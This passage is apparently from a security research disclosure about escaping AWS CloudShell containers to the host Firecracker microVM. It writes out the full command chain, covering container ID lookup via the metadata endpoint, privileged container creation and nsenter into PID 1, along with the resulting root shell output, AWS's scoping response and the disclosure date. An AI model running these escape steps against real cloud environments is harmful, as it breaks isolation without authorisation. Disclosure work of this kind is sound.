* We were able to find a bi-directional path with read/write access from the CloudShell container all the way down to the microVM. We can technically create a bundle/rootfs for any custom image that we want to run. The path /aws/mde/logs on CloudShell translates to /volume/mde-volume/logs on the microVM.
# prepare a dummy rootfs dir
mkdir -p /aws/mde/logs/123/rootfs
# select a target container for using its rootfs
export TARGET_CONTAINER=$(curl -s http://169.254.170.2/v2/metadata | jq -r '.Containers[] | select(.Name=="moontide-wait-for-all") | .DockerId')
# create container using the target container fs
./firecracker-containerd-agent-client create \
--id escaped-123 \
--priv \
--bundle /volume/mde-volume/logs/123 \
--rootfs-config '{"type":"overlay","target":"/","options":["lowerdir=/container/'$TARGET_CONTAINER'/rootfs", "upperdir=/volume/_containers/'$TARGET_CONTAINER'/upperdir", "workdir=/volume/_containers/'$TARGET_CONTAINER'/workdir"]}' \
--mounts-config '[{"type":"bind","destination":"/dev/init","source":"/sbin/tini","options":["bind","ro"]}]' \
--pid /proc/1/ns/pid \
/dev/init -- /usr/bin/sleep infinity
# enter namespace of PID 1 and run bash
./firecracker-containerd-agent-client exec --container_id escaped-123 --priv --io --tty /usr/bin/nsenter -t 1 -m -u -n -i bash
2023/09/26 14:53:24 Execution ID: 1a70786c-554f-4e0a-954e-e881c81820ab
2023/09/26 14:53:25 Proxy attached...
2023/09/26 14:53:25 Exec call successfull, starting process...
2023/09/26 14:53:25 Command executed with PID: 20496
bash-4.2# id
uid=0(root) gid=0(root) groups=0(root)
bash-4.2# cat /etc/image-id
image_name="amzn2-firecracker-fargate"
image_version="2"
image_arch="x86_64"
image_file="amzn2-firecracker-fargate-2.01.2023-0808-2234-x86_64.ext4"
image_stamp="8c6b-a3b1"
image_date="20230808223512"
recipe_name="amzn2 firecracker"
recipe_id="20759e13-0635-8460-33e6-6e61-356e-9be3-7326d45f"
NOTE: The underlying CloudShell Firecracker VM image is a stripped-down Amazon Linux 2. It doesn’t have the utilities you might expect (e.g. ps, ip, etc.) and doesn’t contain a package manager either. To install yum, use the commands in this gist: https://gist.github.com/dehydr8/9b2859611092ccc3239efeef6b7d7f02
You can then use yum to install the packages you want.
Comments from Ronin & AWS Security
Even though we can get credentials for all the underlying roles that make CloudShell work, and even after escaping to the parent containers and the host microVM, we’re still isolated to our own instance/environment. We haven’t fully enumerated the permissions for all of these credentials, but they appear to be scoped to the running instance/environment.
The findings were reported to AWS Security on Jul 31, 2023. Here’s their comment:
The service team has carefully reviewed your submission and confirmed that all data you were able to enumerate, including disk contents, SSM agent logs, environment variables, etc. are relevant only to your specific CloudShell environment and are known to be visible to the CloudShell user. All credentials enumerated on the host are scoped-down to the single CloudShell instance and can’t be used to access anything other than a customer’s own CloudShell, of which they have full control of already.
Acknowledgements
We want to express our sincere gratitude to Konrad T. and the AWS Security Outreach team for always being a pleasure to deal with.